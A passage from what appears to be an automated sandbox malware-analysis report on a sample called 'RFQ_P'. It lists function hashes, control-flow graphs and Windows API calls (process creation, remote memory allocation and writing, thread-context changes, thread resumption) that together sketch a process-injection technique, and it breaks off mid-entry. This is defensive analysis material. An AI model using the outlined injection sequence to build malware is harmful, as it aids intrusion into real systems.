                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a73706855adf7ee07eb3e3784b4bdae0b2189a518237454135cf6f387dc1149
                                                                                                              • Instruction ID: c5d29da1f84125736ef4244ce8cdc1c24706d17e1929ec381e8fc24b3b7c7c2c
                                                                                                              • Opcode Fuzzy Hash: 1a73706855adf7ee07eb3e3784b4bdae0b2189a518237454135cf6f387dc1149
                                                                                                              • Instruction Fuzzy Hash: 28314B71E056488FDB19CFAAC8906DDBFB2AF89300F14C1AAD409AB265C7345A45CF50
                                                                                                              Function 00651820 Relevance: .1, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf85bc133c04dcb15a6b9dbb4ed34f78f41e939687167fe6e88e902b9925b447
                                                                                                              • Instruction ID: 7c6e2e49b00485a722f891a31137622d4bf18ecc93ca0289082382bd81c8ca78
                                                                                                              • Opcode Fuzzy Hash: bf85bc133c04dcb15a6b9dbb4ed34f78f41e939687167fe6e88e902b9925b447
                                                                                                              • Instruction Fuzzy Hash: 9A31FA70D056588FDB18CFA6D8583DEBBF7AFCA301F14C46AD809AA265DB74094ACF40
                                                                                                              Function 00659922 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 272e6b12442327f22cddc56cfcb3c7de15005363757349659fa47023afdb47b6
                                                                                                              • Instruction ID: ae195476b89f4a8a4442dba52fbbb6ca970c37b445687a99d5f8e92d2b8d205e
                                                                                                              • Opcode Fuzzy Hash: 272e6b12442327f22cddc56cfcb3c7de15005363757349659fa47023afdb47b6
                                                                                                              • Instruction Fuzzy Hash: 4A217C30909218CFDB24DFA4D9457E8BBB6EB46316F1455DAC90DA7252C7304F8ACF62
                                                                                                              Function 00659C97 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2add35e3783be273d41ca24b5678de1150efbe2ffe651fbc2e11bafe809cdb64
                                                                                                              • Instruction ID: 2cfd7ae259e129d6427981f814f65f582a17d84e5b703af0e3337326069c70a2
                                                                                                              • Opcode Fuzzy Hash: 2add35e3783be273d41ca24b5678de1150efbe2ffe651fbc2e11bafe809cdb64
                                                                                                              • Instruction Fuzzy Hash: A7213470D05228CFDB24DFA4D945BECB7B6EB4A316F1454E6D80DA7241C6309E89CF61
                                                                                                              Function 0065989A Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17e114d9f5624acaf729174d3cc6a42bb87dde0e529af48ef3644947e25bd77a
                                                                                                              • Instruction ID: d7b3534096e695d3a1c42c88145a2fc00ec96fd8b5fe5c5c73fcf21359ad46fd
                                                                                                              • Opcode Fuzzy Hash: 17e114d9f5624acaf729174d3cc6a42bb87dde0e529af48ef3644947e25bd77a
                                                                                                              • Instruction Fuzzy Hash: 81114C30D19218CFDB24CFA8D9467ECB7B6EB0A306F1015D5D90EA2251C7304E89CF51
                                                                                                              Function 00659876 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 59ada0e7d231f8e9256071e5053a3d8afd50388fd2ab3666259b4978015a0d4a
                                                                                                              • Instruction ID: 93da1fcb522635f46b17b0696473f1e5809478529c907b4abda986e01e61ca5a
                                                                                                              • Opcode Fuzzy Hash: 59ada0e7d231f8e9256071e5053a3d8afd50388fd2ab3666259b4978015a0d4a
                                                                                                              • Instruction Fuzzy Hash: CF113930D09218CBDB60CFA8E8457FCB7BAAB4A312F105195D80EA3251CB304E8ADF52
                                                                                                              Function 00656918 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 191 656918-6569b1 193 6569b3-6569ca 191->193 194 6569fa-656a22 191->194 193->194 197 6569cc-6569d1 193->197 198 656a24-656a38 194->198 199 656a68-656abe 194->199 200 6569f4-6569f7 197->200 201 6569d3-6569dd 197->201 198->199 206 656a3a-656a3f 198->206 208 656b04-656bfb CreateProcessA 199->208 209 656ac0-656ad4 199->209 200->194 203 6569e1-6569f0 201->203 204 6569df 201->204 203->203 207 6569f2 203->207 204->203 210 656a41-656a4b 206->210 211 656a62-656a65 206->211 207->200 227 656c04-656ce9 208->227 228 656bfd-656c03 208->228 209->208 217 656ad6-656adb 209->217 212 656a4d 210->212 213 656a4f-656a5e 210->213 211->199 212->213 213->213 216 656a60 213->216 216->211 219 656add-656ae7 217->219 220 656afe-656b01 217->220 221 656ae9 219->221 222 656aeb-656afa 219->222 220->208 221->222 222->222 223 656afc 222->223 223->220 240 656cf9-656cfd 227->240 241 656ceb-656cef 227->241 228->227 243 656d0d-656d11 240->243 244 656cff-656d03 240->244 241->240 242 656cf1 241->242 242->240 246 656d21-656d25 243->246 247 656d13-656d17 243->247 244->243 245 656d05 244->245 245->243 248 656d27-656d50 246->248 249 656d5b-656d66 246->249 247->246 250 656d19 247->250 248->249 254 656d67 249->254 250->246 254->254
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00656BDF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: bbfef185dacf0c5b6fce352df7a67aa61807b80759dc5e5e5905217e741d81f4
                                                                                                              • Instruction ID: a13d87b5fe84cfa46b8216d495a6450664b02775041332f31361ec5de9994123
                                                                                                              • Opcode Fuzzy Hash: bbfef185dacf0c5b6fce352df7a67aa61807b80759dc5e5e5905217e741d81f4
                                                                                                              • Instruction Fuzzy Hash: 17C118B1D002198FDF20CFA4C845BEDBBB2BF45301F0096A9E859B7240DB749A89CF91
                                                                                                              Function 00656580 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 255 656580-6565eb 257 656602-656669 WriteProcessMemory 255->257 258 6565ed-6565ff 255->258 260 656672-6566c4 257->260 261 65666b-656671 257->261 258->257 261->260
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: bf6c1fa5b771411159d989328453e71c3bec645ef26ac937db330f65634c3f54
                                                                                                              • Instruction ID: 4e3c760773947fd80feb7809f2cac9ed56e5a59a3124070ba6d58d556d70dd41
                                                                                                              • Opcode Fuzzy Hash: bf6c1fa5b771411159d989328453e71c3bec645ef26ac937db330f65634c3f54
                                                                                                              • Instruction Fuzzy Hash: 5541ABB4D012589FCF00CFA9D984AEEFBF1BB49310F20902AE814BB210D734AA45CF65
                                                                                                              Function 00656578 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 266 656578-6565eb 269 656602-656669 WriteProcessMemory 266->269 270 6565ed-6565ff 266->270 272 656672-6566c4 269->272 273 65666b-656671 269->273 270->269 273->272
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 323e1f462ad34f631472adb7e2a73578595ffc383dfad981130d4a87a8653eb7
                                                                                                              • Instruction ID: aa879d2b6779444cf1ddeecfb9ac61293fe52efdcdcbaf435d466d07d3962a25
                                                                                                              • Opcode Fuzzy Hash: 323e1f462ad34f631472adb7e2a73578595ffc383dfad981130d4a87a8653eb7
                                                                                                              • Instruction Fuzzy Hash: E941BBB4D00218CFDF00CFA9D984AEEBBB1BF49310F24902AE814BB250D734AA45CF64
                                                                                                              Function 006566D9 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 278 6566d9-6567a8 ReadProcessMemory 281 6567b1-656803 278->281 282 6567aa-6567b0 278->282 282->281
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 667697d7dcf81ce97c86aab2d368d000e41899539677fb742db462826c2c5e9f
                                                                                                              • Instruction ID: 0d7782a7f968474b9758043d90050586ab16d5ef6219c3b3c6bd2b9b7268767b
                                                                                                              • Opcode Fuzzy Hash: 667697d7dcf81ce97c86aab2d368d000e41899539677fb742db462826c2c5e9f
                                                                                                              • Instruction Fuzzy Hash: 8E41A8B9D002589FCF00CFA9D884AEEFBB1BF49314F24942AE814BB210D735A945DF64
                                                                                                              Function 006566E0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 287 6566e0-6567a8 ReadProcessMemory 290 6567b1-656803 287->290 291 6567aa-6567b0 287->291 291->290
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 3c1f1e4a8e28ac7649ae9754cdbb5980d46abeca4fe95b2d6c9dc1987f60b821
                                                                                                              • Instruction ID: 3e88a7e0caf4e5cc6e22b490b2d331612304aceb782a574e5f2bc1bf4293b2c6
                                                                                                              • Opcode Fuzzy Hash: 3c1f1e4a8e28ac7649ae9754cdbb5980d46abeca4fe95b2d6c9dc1987f60b821
                                                                                                              • Instruction Fuzzy Hash: 1F4199B9D00258DFCF00CFA9D884AEEFBB1BB49314F20942AE814B7210D775A955DF65
                                                                                                              Function 00656450 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 296 656450-656518 VirtualAllocEx 300 656521-65656b 296->300 301 65651a-656520 296->301 301->300
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00656502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 4bc747eb773509f5fb110706998ca2448b9e4fa6357f55b5dd4e3df2cda6e9ac
                                                                                                              • Instruction ID: 0f8ad66598218620292766a7820f5b9743aff673cef1731a6a623503a4de3b6e
                                                                                                              • Opcode Fuzzy Hash: 4bc747eb773509f5fb110706998ca2448b9e4fa6357f55b5dd4e3df2cda6e9ac
                                                                                                              • Instruction Fuzzy Hash: 2941A8B8D002589FCF10CFA9D884AEEBBB5EB49310F20942AE814BB310D735A915DF65
                                                                                                              Function 00656458 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 306 656458-656518 VirtualAllocEx 309 656521-65656b 306->309 310 65651a-656520 306->310 310->309
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00656502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: bfa3d0753d873329ea1fb0b77d639cc7914d24f7b846d0b33529427314249f37
                                                                                                              • Instruction ID: bc925d0a580fbb66efdaf3febfa72e21d865a463e2e22d664acfcab6ca44620c
                                                                                                              • Opcode Fuzzy Hash: bfa3d0753d873329ea1fb0b77d639cc7914d24f7b846d0b33529427314249f37
                                                                                                              • Instruction Fuzzy Hash: FF4197B8D00258DFCF10CFA9D984ADEBBB1FB49310F20942AE814BB210D735A915CFA5
                                                                                                              Function 001BADFA Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 315 1badfa-1baebd VirtualProtect 317 1baebf-1baec5 315->317 318 1baec6-1baf02 315->318 317->318
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001BAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 5b15b5f8675ce1aba3ea4b0a837d5cac8edde13be4276618e943616b873352c7
                                                                                                              • Instruction ID: 79ceaa72fd7c91c6b5495eeaec91d6352ff39859d86e3df84de245b3d0c7b94d
                                                                                                              • Opcode Fuzzy Hash: 5b15b5f8675ce1aba3ea4b0a837d5cac8edde13be4276618e943616b873352c7
                                                                                                              • Instruction Fuzzy Hash: F24198B9D04258DFCF10CFA9D984ADEFBB0AF49310F24902AE814B7210D375A945CF65
                                                                                                              Function 00656321 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 321 656321-656388 323 65639f-6563ed Wow64SetThreadContext 321->323 324 65638a-65639c 321->324 326 6563f6-656442 323->326 327 6563ef-6563f5 323->327 324->323 327->326
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 006563D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 97d7bf85d94b1c65ac326111795a9805e921dbc7d4a18fc48c824a4653417b9b
                                                                                                              • Instruction ID: f589325fd005b9920f43e1a340c272a0d7c2442c249b2d28c186961931095027
                                                                                                              • Opcode Fuzzy Hash: 97d7bf85d94b1c65ac326111795a9805e921dbc7d4a18fc48c824a4653417b9b
                                                                                                              • Instruction Fuzzy Hash: 9F41BBB5D012589FDB10CFA9D884AEEBFB1AF49314F24902AE814BB240D738A949CF54
                                                                                                              Function 00656328 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 338 656328-656388 340 65639f-6563ed Wow64SetThreadContext 338->340 341 65638a-65639c 338->341 343 6563f6-656442 340->343 344 6563ef-6563f5 340->344 341->340 344->343
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 006563D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 2b1d0913d26ff80adeb77b86fe45608a0a85b83653b8c7949e95a87fbfc0c8fc
                                                                                                              • Instruction ID: f53ba4d3f099c3419368b383a3c85e75c2f36027a192ae1dacb9976fe1e9162a
                                                                                                              • Opcode Fuzzy Hash: 2b1d0913d26ff80adeb77b86fe45608a0a85b83653b8c7949e95a87fbfc0c8fc
                                                                                                              • Instruction Fuzzy Hash: F441ACB4D002589FDB10CFAAD884AEEFBB1AB49314F24942AE814B7240D778A949CF54
                                                                                                              Function 001BAE00 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 332 1bae00-1baebd VirtualProtect 334 1baebf-1baec5 332->334 335 1baec6-1baf02 332->335 334->335
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001BAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 42c9facb7ef61eca9156a1652a55a1a04b2885f163acde9b74789f1931738998
                                                                                                              • Instruction ID: 86f8dd9c78e98af8ba6e858ae7c3c761d09d6750a86ae6f1af88beb481b40214
                                                                                                              • Opcode Fuzzy Hash: 42c9facb7ef61eca9156a1652a55a1a04b2885f163acde9b74789f1931738998
                                                                                                              • Instruction Fuzzy Hash: 843185B9D00258DFCF14CFA9D984ADEFBB1AF49310F24902AE824B7210D375AA45CF65
                                                                                                              Function 00656238 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 349 656238-6562cc ResumeThread 352 6562d5-656317 349->352 353 6562ce-6562d4 349->353 353->352
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(?), ref: 006562B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 2bed24f6bbff445c6b8c8e501c9f6fe57b84a0556dc3a5c7f5adaa9053483f65
                                                                                                              • Instruction ID: 34f13b121af79fc4ce4cef4280b99dba6ffc266ab613967817c40ad117473d72
                                                                                                              • Opcode Fuzzy Hash: 2bed24f6bbff445c6b8c8e501c9f6fe57b84a0556dc3a5c7f5adaa9053483f65
                                                                                                              • Instruction Fuzzy Hash: E831A9B4D002189FDF14CFA9D884AEEFBB5AB49310F24942AE814B7310D775A905CF94
                                                                                                              Function 0016D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369066634.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_16d000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7ef8e7f5dd119279658c2fd85c10c814c8567955c7aa2ebdf976ddbb14ee54e
                                                                                                              • Instruction ID: 5218260ee5e2f31e716b3299bf0ab1f2b156d6d8bb15b219e01b2333680ea10a
                                                                                                              • Opcode Fuzzy Hash: e7ef8e7f5dd119279658c2fd85c10c814c8567955c7aa2ebdf976ddbb14ee54e
                                                                                                              • Instruction Fuzzy Hash: 4221B375A04340DFEB05DF14E9D4B26BB65EB84314F24C66DE8494B242C336D866CB62
                                                                                                              Function 0016D01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369066634.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_16d000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25d400d22f664c8a4fd80b052d5a30aca0092d3bf4cf4f058a1e79bbe0d58300
                                                                                                              • Instruction ID: 24885bee760395b6874b8fb9779e005bfbd4599e6458daaab1df18d53230b0fb
                                                                                                              • Opcode Fuzzy Hash: 25d400d22f664c8a4fd80b052d5a30aca0092d3bf4cf4f058a1e79bbe0d58300
                                                                                                              • Instruction Fuzzy Hash: D521C275B04340DFEB14DF14E8C4B26BB65EB88314F34C6A9E8494B246C336D867CBA2
                                                                                                              Function 0016D006 Relevance: .1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369066634.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_16d000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92cc69004cd1ab2a9a24b343e42d161422a3120a7b9e347ab05f3d3fb21bbc7a
                                                                                                              • Instruction ID: e0f37360d2cdb0b513bd5d1fbcdd35fce2a79ad2036d4580d18321350f110688
                                                                                                              • Opcode Fuzzy Hash: 92cc69004cd1ab2a9a24b343e42d161422a3120a7b9e347ab05f3d3fb21bbc7a
                                                                                                              • Instruction Fuzzy Hash: B9218E755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498F6A7C33AD81ACB62
                                                                                                              Function 0016D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369066634.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_16d000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                                              • Instruction ID: 45209dfee3e07220bc559c186efc5340981f0ff4f78280b16e3d5a5c393155e0
                                                                                                              • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                                              • Instruction Fuzzy Hash: 33118B75A04280DFDB11CF14D9D4B15BFA1FB84314F28C6AEDC494B656C33AD85ACBA2

                                                                                                              Non-executed Functions

                                                                                                              Function 001BD6F8 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: {#L
                                                                                                              • API String ID: 0-1361971085
                                                                                                              • Opcode ID: 6f171ef96017149f96553e8b0f6569e33330584a1d44e9394606680220e6276e
                                                                                                              • Instruction ID: 5853323dba8e589111663e020b516cb603e141820b9ea25b92d88511412a4239
                                                                                                              • Opcode Fuzzy Hash: 6f171ef96017149f96553e8b0f6569e33330584a1d44e9394606680220e6276e
                                                                                                              • Instruction Fuzzy Hash: F4E1E475E05219DFCB18CFA6D9845DEFBF2BF89310F24952AD419AB224EB3499428F10
                                                                                                              Function 00655060 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `2,
                                                                                                              • API String ID: 0-1748904608
                                                                                                              • Opcode ID: 1fbd77dd60f4efd754d462d05fad800323fd8ce4001c3fe87f48189c42354f43
                                                                                                              • Instruction ID: 9659bff0f194e08dd71581522e1f08447a18774818ceec6d81b0bef3f832f620
